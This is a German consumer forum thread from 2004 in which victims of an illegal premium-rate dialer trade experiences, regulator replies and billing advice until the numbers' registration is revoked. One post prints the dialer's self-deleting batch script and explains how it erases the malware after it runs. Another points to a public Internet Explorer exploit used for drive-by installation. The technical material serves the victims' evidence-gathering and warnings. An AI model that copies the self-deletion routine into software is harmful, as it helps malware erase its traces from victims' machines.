- Auch bei der BT musst du dich nicht melden. Streng genommen musst du (bei im Net nachgewiesener Existenz eines illegalen Dialers für die betreffende Nummer) auf deren Post noch nicht einmal reagieren (Ausnahme: Mahnbescheid und Klage). Wenn du dich bei denen trotzdem meldest, ist das natürlich ein freundlicher Zug von dir, der die ganze Sache vielleicht zu einem schnelleren Ende führt. 

*@ DATAMAX*
Einspruch an die BT ist nett, aber wichtiger ist Widerspruch bei der Telekom! Vielleicht sind das alte Kamellen für dich (dann vergiss es), aber sonst sieh mal kurz nach: http://forum.computerbetrug.de/viewtopic.php?t=5672&postdays=0&postorder=asc&start=5  (im Thread http://forum.computerbetrug.de/viewtopic.php?t=5672 ).



			
				Qoppa schrieb:
			
		

> DATAMAX schrieb:
> 
> 
> 
> ...


...zumindest nicht mit Aussicht auf Erfolg (finanziell gesehen)...  

Werner


----------



## stef (4 Juni 2004)

*Gesichterte Dateien*

DATAMAX schrieb:


> Die gamepad.exe, sowie den zugehörigen Trojaner der das Teil installiert, habe ich gesichert und könnte sie dir zuschicken.



Wenn du mir die Dateien schicken könntest, wäre das super! Am Besten als zip oder rar. Danke.


----------



## virenscanner (4 Juni 2004)

Wozu?


----------



## TSCoreNinja (4 Juni 2004)

*Einwahlvideo 090090000928*

@DATAMAX
Bist Du sicher, dass der Trojaner den Dialer installiert? Meines Erachtens wird lediglich durch einen Trojaner auf die EinwahlURL weitergeleitet. Computer Associates warnen hier vor einem Virus Harnig B, der in die _kalten Schatten_ von Life and Arts Dialerconnection fuehrt. In der von CA zitierten URL allerdings landete man nicht bei einer deutschen Einwahlnummer, sondern bei einer amerikanischen Nummer. 
Aber die Aehnlichkeit der URL mit der im Forum von Teltarif in diesem Posting genannten ist offenkundig, die Zwischenschritte gut bekannt.
Ansonsten findet sich unter meiner Yahoo Homepage ab sofort auch ein Einwahlvideo zu der Rufnummer 0900-90000928, ebenso wie das zur Rufnummer 0900-9000606. Ist 4MB gross, schliesslich verzoegert der Dialer die Einwahl um 2 Minuten nach Aufruf der URL.

Gr,TSCoreNinja

PS: wenn Yahoo mal wieder wg Ueberlastung sperrt, ein oder zwei Stunden warten...


----------



## Anonymous (8 Juni 2004)

*Atrikel zuvor von TSCoreNinja*

Hallo Betroffene,


TSCoreNinja
super Sache mit dem Filmchen auf deiner Seite. Sehr empfehlenswert und großes Lob für Dich. Ich kann nun ruhiger schlafen. Anhand dieser Abläufe kann man sehr gut nachvollziehen, wie das ganze abläuft. Für jeden, dem das immer noch unklar ist, empfehle ich die Sache selbst einmal anzuschauen und dann auszuprobieren.
Habe mir einen Hardware-Antidialer  für ISDN (39,- Euro, bei Conrad) gekauft und der blockt sofort. Programme können den nicht beeinflussen. Gutes Teil.
Sobald man auf die im Filmchen angegebenen Adresse geht, wird sofort eine d.exe oder eine d_2.exe (die Anzahl der Unterstriche in der Adresse ist dabei entscheident welcher Dialer angewählt wird) in das Verzeichnis C:/windows/system32/prefetch kopiert (Datei ist nur bei Verbindungsaufbau sichtbar!!) und zusätzlich in den Arbeitsspeicher geladen (zu sehen unter dem Taskmanager).
Interessant ist hierbei, dass, wie schon erwähnt, sich die Datei erst nach ein paar Minuten zu schaffen macht. Der bestehende Internetzugang wird geschlossen und ein anderer wird angewählt allerdings nur mit einer Telefonnummer "0" (warum weiß ich noch nicht, sicherlich wird bei erfolgreichem Zugang die Nummer dann nochmals geändert). Mein AntiDialer blockt natürlich sofort und nun versucht die d.exe oder d_2.exe mehrfach zu wählen.....Kommt es zu keiner Verbindung, dann löscht sich die ...exe und es ist nix mehr zu sehen weit und breit. 
Ein Unerase-Programm zeigt zusätzlich nach einem solchen Vorgang eine gelöschte $$del.bat....Diese Datei wird garantiert mit dieser Angelegenheit schwerstens zu tun haben. Es ist mir nicht ganz gelungen diese $$del.bat zurückzuholen, weil das alles sehr schnell geht. Hat jemand einen Tip wie man die fängt?
Hat jemand mal die $$del.bat als Textfile vorliegen? Wäre mal sehr interessant was da drinsteht....Allerdings von einer gamepad.exe weit und breit nix zu sehen.....Der Hashwert der beiden Dateien wirft auch bei der Regtp nix vernünftiges aus.
So nun freu ich mich eigentlich auf ein weiteres Schreiben der Nex.net... Noch habe ich nichts erhalten, aber wenn dann ....grien
Wurfmaterial habe ich nun genügend gesammelt und ein Filmchen von dem Vorgang von mir gibt es auch schon.

In diesem Sinne Leute 
Bis zur nächsten Aktion

Joeke

PS.

Großes Lob nochmals an TSCoreNinja. Guter Job.
(ein Msblast-Virus treibt sich da auch noch in deinem Arbeitsspeicher rum, iss aber halb so schlimm   )


----------



## TSCoreNinja (8 Juni 2004)

*Re: Atrikel zuvor von TSCoreNinja*



			
				Joeke schrieb:
			
		

> Hat jemand mal die $$del.bat als Textfile vorliegen? Wäre mal sehr interessant was da drinsteht....





			
				$$del.bat schrieb:
			
		

> @Echo off
> :begin
> if exist %1 del %1 > nul
> if exist %1 goto begin
> del %0 > nul


Zur Erklaerung %0 ist der Name der Batch Datei, %1 der erte Kommandozeilenparamter. Das Teil wird mit dann mit 

```
$$del.bat %0
```
 aufegerufen, daraufhin sind der Dialer und die bat nach Ablauf der Ausfuehrung weg (Loeschen klappt erst, wenn Proggi nicht mehr laeuft).



> Allerdings von einer gamepad.exe weit und breit nix zu sehen.....Der Hashwert der beiden Dateien wirft auch bei der Regtp nix vernünftiges aus.
> So nun freu ich mich eigentlich auf ein weiteres Schreiben der Nex.net... Noch habe ich nichts erhalten, aber wenn dann ....grien
> Wurfmaterial habe ich nun genügend gesammelt und ein Filmchen von dem Vorgang von mir gibt es auch schon.


Die Gamepad.exe gibts mit der Datei d5.php.exe, selbes Linkschema. Und ruft die Rufnummer 090090000606 an, nachdem sie 2 Minuten gewartet hat. 


> (ein Msblast-Virus treibt sich da auch noch in deinem Arbeitsspeicher rum, iss aber halb so schlimm   )


Ah, danke. Kommt davon, wenn man seine Servicepacks deinstalliert, damit ein bloeder Dialer klappt. Muss mal wieder meinen Virenscanner updaten (aber ich treib eh nichts vernuenftiges unter Windoofs). An dieser Stelle: *Meines Wissens ist der Dialer bei einem mit den letzten Sicherheitsupdates gesicherten Internet Explorer wirkungslos!* Updates sind zu empfehlen.  
Gr,
TSCoreNinja


----------



## Anonymous (8 Juni 2004)

*und wie kommt der rein?*

TSCoreNinja

Great der Code. Thx. 
Einfach aber genial fast....wenn das alles nicht so oberlink mit Kosten verbunden wäre. 
Aber da hätt ich noch ne Frage....Wie kommt denn jetzt die ...exe auf die Festplatte  und in den Arbeitsspeicher? Irgendwie über ActiveX aber da muß doch auch erst mal etwas harmlos aussehendes geladen werden.... denn ohne Zustimmung wird doch keine ...exe und eine $$del.bat geladen ..oder doch? Welcher Trick wird da genau angewandt?

Joeke


----------



## von_Stuelpnagel (18 Juni 2004)

*Einwahlvideo 090090000928*

Hallo,

vielen Dank für das Video, das habe ich mir gerade heruntergeladen.

Bei mir hat Norton Antivirus die Installation eines Trojan.Norio genannten Trojaners gemldet (aber nicht verhindern können?) unmittelbar bevor sich der Dialer auf die 090090000928 eingewählt hat. Dadurch bin ich darauf aufmerksam geworden und konnte die Verbindung unterbrechen. So ist es bei 15€ geblieben, die ich bislang nicht bezahlt habe. Nach Kontaktaufnahme mit Nextnet habe ich das Standardschreiben über die Rechtmäßigkeit des Dialers und den Einzelverbindungsnachweis bekommen. Von einem Unternehmen in Bingen hat bislang keiner was gesagt. 

Der Dialer hat sich bei mir nicht wieder gemeldet (hoffe ich), problematisch war die Entfernung der geänderten Registry Einträge, die mich immer wieder auf die blöde CoolWebSearch Seite gebracht haben.


----------



## Anonymous (19 Juni 2004)

*Re: und wie kommt der rein?*



			
				Joeke schrieb:
			
		

> Aber da hätt ich noch ne Frage....Wie kommt denn jetzt die ...exe auf die Festplatte  und in den Arbeitsspeicher? Irgendwie über ActiveX aber da muß doch auch erst mal etwas harmlos aussehendes geladen werden.... denn ohne Zustimmung wird doch keine ...exe und eine $$del.bat geladen ..oder doch? Welcher Trick wird da genau angewandt?


Kein ActiveX, nur Sicherheitsloch im Internet Explorer! Genauer, im XML Parser. Zur Technik: siehe Warnung von Security Focus, http://www.securityfocus.com/bid/8565/exploit/
TSCoreNinja


----------



## von_Stuelpnagel (19 Juni 2004)

*Antwort der RegTP*

Hallo,

mich würde interessieren: 

Hat eigentlich jetzt schon jemand der RegTP Unterlagen aus denen die illegale Vorgehensweise des Dialers erkennbar ist zugeleitet und hat sich die RegTP schon mal gemeldet? Hat schon jemand Strafanzeige erstattet und wenn ja, welche Unterlagen dazu eingereicht?

Ich würde auch gerne Strafanzeige erstatten, habe aber ausser dem Nachweis, dass sich der Trojaner, von dem ich vermute, dass er mit der Installation des Dialers in Zusammenhang steht, auf meinem Rechner installiert hat (wobei ich den Trojaner selber dummerweise gelöscht habe) und den vom Trojaner geänderten Registry Einträgen keinerlei Beweismittel. 

MR


----------



## stef (19 Juni 2004)

*Wie sieht es aus mit Mahnungen?*

Hallo,

mich würde auch mal interessieren, ob jemand der RegTP diesen Trojaner geschickt hat, von dem die Rede ist. Ich selbst hab wie gesagt keine Beweise, hab denen nur die Beschreibung des Vorgangs und dann später auch das hier bekannte Video der Einwahl geschickt.

Außerdem interessiert es mich, wer denn außer der ersten "Standard-Antwort" von NexNet darüber hinaus noch mal was gehört hat.
Ich habe seit dem weder aus Bingen noch von NexNet noch was gehört! Hat jemand schon Mahnungen etc. bekommen? Oder gibt es vielleicht für die 928 auch schon einen Mahnstopp wie offensichtlich bei der 090090000606?

Bei mir hat sich wie gesagt seit keiner mehr mit irgendwelchen Forderungen gemeldet. Entweder haben die eingesehen, dass diese Dialergeschichte nicht so ganz legal war, oder die lassen sich einfach Zeit. Weiß jemand, wie lange das sonst so dauert, bis man eine Mahnung bekommt?

Und noch mal: Alle Dateien, Registry-Einträge und Hinweise bitte immer sofort an die Regulierungsbehörde schicken. Von der hab ich übrigens auch nichts mehr gehört.


----------



## SDJungle (20 Juni 2004)

...und von mir gibts auch nichts neues zu berichten. Die Telekom ist wie schon gesagt sowieso schon außen vor, ansonsten habe ich zwischenzeitlich weder von der Regulierungsbehörde, noch vom 'Diensteanbieter' etwas gehört oder gelesen...

Gruß
Stefan


----------



## Anonymous (21 Juni 2004)

*XML-Parser*

Hallo,


was um alles in der Welt ist denn nun wieder ein XML-Parser???
Mir scheint je mehr Sicherheitslücken gefunden werden, um so mehr neue Begriffe werden hervorgekramt.
Die angegebene Addi zum XML-Parser ist nicht sehr aufschlußreich....
Ansonsten
Also von meiner Seite auch wenig neues im Moment. NexNet behauptete in einem Schreiben vor kurzem, dass die Verbindung rechtmäßig entstanden sei, ich mich bei inhaltlichen Dingen der angeblich gewählten Dienste an die Bingener Adresse zu wenden und ich zu zahlen habe. Ende aus. Mahnung und der gleichen noch nix.
Ist denn bei einem die NexNet GmbH schon weiter als bei mir gegangen?
Wäre mal interessant zu wissen, wieviel Zeit ich noch habe, um ordentlichen Streit vom Zaun zu brechen und wenn es sein muß fahr ich sogar nach Bingen, um dort die Leute mal zur Rede zu stellen. Immerhin wird mir ja die Adresse von NexNet genannt, ist also mein gutes Recht.
Ich glaub da gibt es einige Leutehier, die so etwas gern mal tun würden. Oder?
Kann aber auch sein, dass sich alles in Luft auflöst, weil sowieso eine Sperrung vorgesehen ist, aber von der RegTP bekommt man keine weiteren Informationen, obwohl es sicherlich (inkl. meiner) ausreichend Beschwerden gehagelt hat.
Wie weit sind die Ermittlungen anderer Behörden incl. RegTP bei dieser Nummer? Wer weiß was oder besser wer weiß mehr?

Joeke


----------



## TSCoreNinja (21 Juni 2004)

*Re: XML-Parser*



			
				Joeke schrieb:
			
		

> was um alles in der Welt ist denn nun wieder ein XML-Parser???
> Mir scheint je mehr Sicherheitslücken gefunden werden, um so mehr neue Begriffe werden hervorgekramt.
> Die angegebene Addi zum XML-Parser ist nicht sehr aufschlußreich....


Sorry, wenn das alles sehr technisch ist. Zu gut Deutsch: Webseiten werden je nach Typ und Art des aufrufenden Links (hier zu einem) verschieden interpretiert, und koennen neben HTML z.B. Scripte (hier zur Erzeugung des Dialers auf der Platte) und Programmaufrufe (hier des Dialers) enthalten. Dies sollte allerdings nur bei vertrauenswuerdigen Quellen funktionieren. Und Microsoft hat es mal wieder geschafft, die Ueberpruefung zu versauen... Ist das verstaendlicher? 

Hier noch ein Link auf das Eingestaendnis/Security Bulletins des Verursachers Microsoft. 

Ob allerdings folgender Text deutlicher ist? 


			
				Security Bulletin schrieb:
			
		

> A vulnerability that occurs because Internet Explorer does not properly determine an object type returned from a Web server during XML data binding. It could be possible for an attacker who exploited this vulnerability to run arbitrary code on a user's system. If a user visited an attacker's Web site, it could be possible for the attacker to exploit this vulnerability without any other user action. An attacker could also craft an HTML-based e-mail that would attempt to exploit this vulnerability.


Netter Gebrauch des Konjunktivs, BTW.
Gr,
TSCoreNinja


----------



## TSCoreNinja (21 Juni 2004)

*Another one bites the dust?*



			
				Einstige ExDialer Download Site schrieb:
			
		

> Dear valued customers,
> We are sorry to say that we were forced to close down our platform forever and discontinue any business with you.
> Due to numerous attacks we have received from our compeditors and "evilwebmasters" we were forced to go out of business.
> Those attacks were dialer hijacking done by compeditors, framing numbers with carriers with hacked and modified dialers of us to block our payout only to name a few...
> ...


Ob der werte Kaufmann aus Bingen bzw seine Dialerdrueckerkollegen von Brain Solutions Inc, bzw. Dialerconnection oder Payoutpal nur arme Opfer sind? Schade ist es IMHO nicht...
Gr,
TSCoreNinja


----------



## Anonymous (22 Juni 2004)

*bloß gut*

ich bin zu Tränen gerührt......
Ich hoffe diese Schreiberseele konnte wenigstens noch die Buchstaben treffen vor Lachen.
Das schnelle Geschäft ist schiefgegangen (vielleicht auch nicht) und man ist Ihnen zu schnell auf die Schliche gekommen. Zum Glück kann man genauso schnell wie solche Sachen aus dem Boden schießen auch Gegenmaßnahmen ergreifen....Das hat dieses Forum schon gut geleistet.

Also Leute weiter so.
Wenn es was neues gibt zu unserem Fall gibt, immer melden und hier hineinschreiben.


----------



## Anonymous (22 Juni 2004)

*Antworten aus Bingen und von nexnet*

Hallo alle!

Ich habe jetzt eine Antwort von der Frau aus Bingen:"maschinell
erstellt und daher nicht unterschrieben" mit den Hinweisen auf
microjuris und Brain Solutions. Ausserdem steht da "rein informativ",
dass derartige Premium-Dienste nur auf Seiten erotischen und
pornographischen Inhaltes (hier folgen dann verbale Details, hihi)
eingebaut seien. Das soll wohl die Leute erschrecken, nach dem 
Motto: "Huch, wenn das rauskommt..."  8) 

hat ja aber NIX mit der Tatsache zu tun, dass der Dialer ein illegales
(m.E.) Teil ist - und ausserdem nicht der bei der RegTP unter der
Nummer 0900....928 registrierte.

Sehe ich das richtig?

Das werde ich dann als nächstes an nexnet schreiben.
Die hae ich bisher nur gefragt, warum sie Briefe beantworten, die 
an eine ganz andere Firma gerichtet sind (BT).
Antwort kam sofort, kennt ihr ja: sie sind mit Beschwerdenbearbeitung
und Mahnwesen beauftragt.

Mahnen die dan wirkich irgendwann?

Grüße von
Bernd


----------



## stef (25 Juni 2004)

*Antwort der RegTP*

Hallo,

habe heute eine schriftliche Antwort der Regulierungsbehörde erhalten:

Inhalt zusammengefasst.
Leider nicht genug Beweise, RegTP könne deshalb nicht tätig werden. Allgemein würden die Beschwerden aber gesammelt, um bei Häufungen dann doch Maßnahmen einzuleiten. Hinweise auf Info-Broschüren der RegTP für zivilrechtliche Auseinandersetzung etc.

Na super!

Wenn sich aber die meisten hier aus dem Forum beschwert haben, ist das denn noch keine Häufung??? Wie viele Leute müssen denn noch abgezockt werden, damit die RegTP eine "Häufung" der Beschwerden feststellen kann???

Allerdings wurde das Antwortschreiben von einem anderen Sachbearbeiter unterschrieben als der, der die Antworten auf meine eMails zurückgeschickt hat und der Beschwerde nachgehen wollte, obwohl ich beim Ausfüllen des Formblatts explizit auf meine Mails Bezug genommen habe.
Hab ja mittlerweile auch das Einwahlvideo von TSCoreNinja an die RegTP geschickt. Mehr Beweismittel hab ich halt nicht, oder soll ich denen noch das Telefonkabel als Beweismittel zuschicken?!?

Abgesehen davon sagte man mir vorher telefonisch, dass wegen dieser Rufnummer (090090000928) ermittelt werde.
Also was denn nun?

Vielleicht kam das Antwortschreiben ja auch nur von einem unmotivierten Mitarbeiter, der keine Lust hatte, mir über den aktuellen Stand der Recherchen Auskunft zu geben (oder es nicht darf) und einfach erstmal eine Standard-Antwort zurückgeschickt hat.

Sei's drum - der Dialer ist illegal und zivilrechtlich ändert es wohl sowieso nichts, ob die RegTP glaubt, aktiv werden zu müssen oder nicht.

Und außerdem: Die Tatsache, dass die meinen Fall nicht näher beachten, heißt ja nicht, dass andere Beschwerden erfolglos bleiben. Hier haben sich doch auch angeblich einige beschwert: Was habt ihr denn von der RegTP als Antwort bekommen?

Naja, mal abwarten, was passiert. Von NexNet und aus Bingen hab ich im Übrigen seit dem ersten Antwortschreiben von NexNet noch immer nichts gehört.

Bitte schreibt hier ins Forum, sobald ihr was Neues wisst.
Bis dann,
Stef


----------



## Reducal (25 Juni 2004)

*Re: Antworten aus Bingen und von nexnet*



			
				drama 44 schrieb:
			
		

> ...nexnet ... Mahnen die dan wirkich irgendwann?


 JA,  die führen das Beschwerdemanagement der BT und werden die Sache voll durch ziehen. Es sei denn, es kommt nicht zwischenzeitlich zu einer erstaunlichen Wende im Forderungsprozesses.

@ TSCoreNinja, dat Ding läuft!

@ all, ich hatte mich vor drei Jahren schon im Sharkclub am Berliner Gendarmenmarkt beschissen gefühlt und nun wird es wohl nur eine Frage der Zeit sein, bis deren Zeichen tiefe Schatten ziehen. Allen Geschädigten kann nur geraten werden, die T-Com mit ihrem Forderungsmanagement noch einige Zeit hin zu halten. Womöglich kommt es zu einer Entregistrierung der Produkte für die Bingener Registrierungsverpflichtete verantwortlich zeigen. Begründete Beschwerden sind zuständigkeitshalber an die RegTP zu richten.


----------



## Anonymous (26 Juni 2004)

*RegTP-Nerven*

Also TSCoreNinja's Filmchen, sekundengenaue Unterbrechung und Doppelbuchungen zur gleichen Zeit und mit dem gleichen Betrag keine Beweise sind, dann weiß ich nicht....Dann würde ich so langsam am Rechtsstaat zweifeln.
Ich denke da saß wohl eher ein entnervter RegTPler der um sich gebissen hat. Ich kann da fast mitfühlen.....Es muß wie eine Sintflut Beschwerden hageln.
Reducal
Hat denn jemand schon die volle Tour Mahnung von der NexNet abbekommen? Oder vermutest du das nur, dass es kommen wird?

Joeke


----------



## Reducal (26 Juni 2004)

*Re: RegTP-Nerven*



			
				Joeke schrieb:
			
		

> Hat denn jemand schon die volle Tour Mahnung von der NexNet abbekommen? Oder vermutest du das nur, dass es kommen wird?


...reine Spekulation nach diversen Aktionen - jetzt sind die BT und die RegTP am Zug.


----------



## von_Stuelpnagel (2 Juli 2004)

*Wie sieht es aus mit Mahnungen?*

Bei mir sieht es ähnlich aus.

Von Nexnet habe ich bislang nur die Standardmail bekommen und nach Anforderung den Einzelverbindungsnachweis. Das hat allerdings schon 14 Tage nach Anforderung gedauert (haben sie diesbezüglich viel zu tun?). Seitdem sind mittlerweile auch wieder mehr als zwei Wochen vergangen ohne dass ich irgendeine weitere Nachricht bekommen hätte. Von der RegTP habe ich auch noch nichts gehört.

MR


----------



## Anonymous (3 Juli 2004)

Also ich habe als Geschädigter das Geld einbehalten, und  Nexnet sofort um einem genauen Nachweis der genutzen Leistung gebeten. 

Das ist nun fast Zwei Monate her und ich habe set dem nix mehr gehört...

...ob das je nochwas kommt? Ich wäre zumindest gewappnet...

Auf eine Beschwerde bei der RegTP habe ich auch nur die gleiche Standartmail zurückbekommen - ich denke bis der dortige, lahme behördliche Ablauf mal greift ist aller tage Abend...

MfG


----------



## neward (18 Juli 2004)

Hallo an alle!

Aktueller Eintrag zur 090090000928 in der Datenbank der RegTP:

Registrierung wurde zurückgenommen.Die Rücknahme ist noch nicht bestandskräftig.

Auskunft der RegTP an mich per E-Mail zu der Frage:

> Was bedeutet "Rücknahme der Registrierung ist noch nicht bestandskräftig" ?



			
				RegTP schrieb:
			
		

> der Bescheid der Regulierungsbehörde ist noch nicht bestandskräftig
> bedeutet:
> 
> Die Firma hat gegen den Bescheid der Regulierungsbehörde Widerspruch
> ...



Die RegTP sagt also: Es braucht erstmal nicht bezahlt zu werden.

Werner


----------



## Anonymous (18 Juli 2004)

und was ist mit der 090090000606?  Na ja, immerhin hat es diesmal doch nur 3 Monate gedauert - da is man Schlimmeres gewohnt


----------



## Aka-Aka (18 Juli 2004)

Und dieser Artikel hier sollte auch nicht ganz vergessen werden... Wenn man alle Spuren, die von da aus angesprochen werden, verfolgt, ..., boa!
 ein Highlight! 
Bin ja gespannt, ob der Herr W. aus Berlin sein Engagement in die L&A nicht doch noch bereut. Falls nicht - ich behalte es im Auge, versprochen!


----------



## stef (18 Juli 2004)

*Endlich!*

Jo super, aber das wurde ja auch Zeit. Ich dachte zwischenzeitlich schon, da tut sich nix mehr. Endlich unternimmt die Regulierungsbehörde mal was in dieser Sache.

Auch wenn die Rücknahme noch nicht "bestandskräftig" ist, so darf ich doch schon mal allen Mit-Opfern dieses Dialers zum (vorläufigen) Sieg gratulieren.

Vielen Dank an alle, die Beschwerde eingereicht haben und eventuell Beweise geliefert haben. Persönlich möchte ich mich auch noch mal bei TSCoreNinja bedanken, insbesondere für das Einwahl-Video.

Ich hoffe mal (ich gehe eigentlich davon aus), dass die Rücknahme bald auch endgültig sein wird und der scheinbar eingelegte Widerspruch dieser Dialer-[] beim zuständigen Richter (?) bald im Papierkorb landet.

Also macht's gut,
Stef

*[Virenscanner: Vorsichtshalber ein Wort gelöscht]*


----------



## Reducal (18 Juli 2004)

... und nicht zu vergessen die laufenden Verfahren bei der StA Mainz.  8)


----------



## Aka-Aka (18 Juli 2004)

aha. Mainz hoffentlich nicht nur singend und lachend, sondern evtl Gedanken machend, zB darüber, wieso die von TSCN angesprochene gibnetltd-domain (*com) zu Ebay führt ?! Is mir neu, dass ebay auf Gibraltar zu Hause ist... Neu dagegen nicht: zu den Partnern des von TSCN erwähnten Netzwerks gehört seit 27.5.04 eine Firma aus Spanien... (-->siehe posting #50504)


----------



## Anonymous (19 Juli 2004)

*Hauptsache nicht bezahlt*

Ich kann nur sagen, einfach nicht zahlen. Ich habe im Mai eine Rechnung bekommen. Dann bei der Telekom den Posten nicht gezahlt(natürlich mit Hinweis) und außer dem freundlichen Hinweis, dass ich zahlen müsste, hat sich bis heute nix getan.


----------



## Aka-Aka (19 Juli 2004)

*Re: Hauptsache nicht bezahlt*



			
				Spencer2002 schrieb:
			
		

> Ich kann nur sagen, einfach nicht zahlen. Ich habe im Mai eine Rechnung bekommen. Dann bei der Telekom den Posten nicht gezahlt(natürlich mit Hinweis) und außer dem freundlichen Hinweis, dass ich zahlen müsste, hat sich bis heute nix getan.



Klar nicht zahlen. Höchstens spenden. Ans "Hilfswerk für notleidende Geschäftsleute _ mit löchrigem Mantel _" !


----------



## Anonymous (2 August 2004)

*endlich*

Hallo Leute,


nun stehts auch Schwarz auf Weiß bei der RegTP:

Bescheid vom Rufnummer Kategorie Maßnahme 
20.07.2004 90090000606 Dialer * Entzug der Registrierung 
13.07.2004 90090000928 Dialer * Entzug der Registrierung 


Ich danke allen Leuten (besonders TScoreNinja) die diesen [] das Handwerk legen konnten und dafür gesorgt haben, dass diese Seiten incl. Forumbetreiber zustande gekommen sind. Es hat sich wieder mal gezeigt, dass auch User sich ausreichend wehren können und nicht auf Gedeih und Verderb verfilzten Firmenstrukturen oder gar verarmten Geschäftemachern zu Opfer fallen müssen. 
Ohne RegTP wäre es auch ziemlich schwierig geworden, dass muß man auch einräumen und erwähnen. Glück wohl, dass es diese Institution schon gab, denn so alt (seit letzem Jahr) ist dieser Teil der Behörde ja auch noch nicht. 
Wie die RegTP sich in Zukunft schlagen will, in Sachen Recht und Ordnung im Internet, ist mir ein Rätsel, weil ja auch die Net-Probleme nicht weniger werden.  Wie auch immer, in unserem lehrreichen Fall (fands wirklich spannend und hab viel über Sicherheit gelernt) ist es gut gegangen.

Ich wünsche allen Usern weiterhin viel Spaß mit diesem zukunftsträchtigen Unterhaltungsmedium.......
Vielleicht trifft man sich ja mal....

Tschau Joeke

*[Virenscanner: Vorsichtshalber ein Wort entfernt]*


----------



## neward (3 August 2004)

Joeke schrieb:
			
		

> ...in unserem lehrreichen Fall (...) ist es gut gegangen.


...wahrscheinlich nur für diejenigen, die wirklich engagiert genug waren, sich hier (oder wo auch immer sonst) schlau zu machen.
Ich befürchte, es gibt viel zu viele Leute die einfach bezahlt haben und bezahlen werden, so dass sich das Geschäft - für wen auch immer - dennoch gelohnt haben wird und weiterhin lohnen wird. Leider!

Nun ja, aber es ist trotzdem ein schönes Gefühl, die ...928 am Boden zerstört zu sehen!!

Ansonsten kann ich mich den Credits von Joeke nur voll anschließen: Danke !!

Werner


----------



## stef (4 August 2004)

*Hahaha*

Tach nochmal,

ihr werdets nicht glauben, aber drei Wochen nach Entzug der Registrierung habe ich von der RegTP doch tatsächlich eine Mail bekommen, in der steht, dass man in meinem Fall leider noch nichts machen könne.

Hallo?!

Die RegTP hat doch schon was gemacht? Scheinbar haben das da aber noch nicht alle Mitarbeiter mitgekriegt!

Hab denen jetzt auch mal geschrieben, dass die ihre interne Kommukation mal verbessern sollten.

Trotzdem habe ich mich natürlich auch für den Entzug der Registrierung des Dialers bedankt.

NexNet und die Bingener werden sich jetzt wohl nicht mehr melden...


----------



## Anonymous (9 August 2004)

*an Stef*

Hallo Betroffene,


Stef
an die RegTP schreiben, wollt ich erst auch, bis ich von der RegTP an mich persönlich geschrieben, folgendes gefunden habe:


Auskünfte über Beschwerden, Untersuchungen und begonnene aber noch nicht abgeschlossene Maßnahmen werden sowohl aus datenschutzrechtlichen Gründen als auch aus ermittlungstaktischen Gründen  nicht erteilt.


Kann man also alles vergessen, die werden nix sagen, sondern immer nur drumherumreden.
Kann man von halten was man will, ich kann es sogar verstehen, denn alles was die Leute uns mitteilen, landet doch mit Sicherheit hier in dem Forum und dann wissens die Dialer auch!! 
Nochmals einen Gruß an unseren speziellen Freund von hier aus

 :lol: 


mfg
Joeke


----------

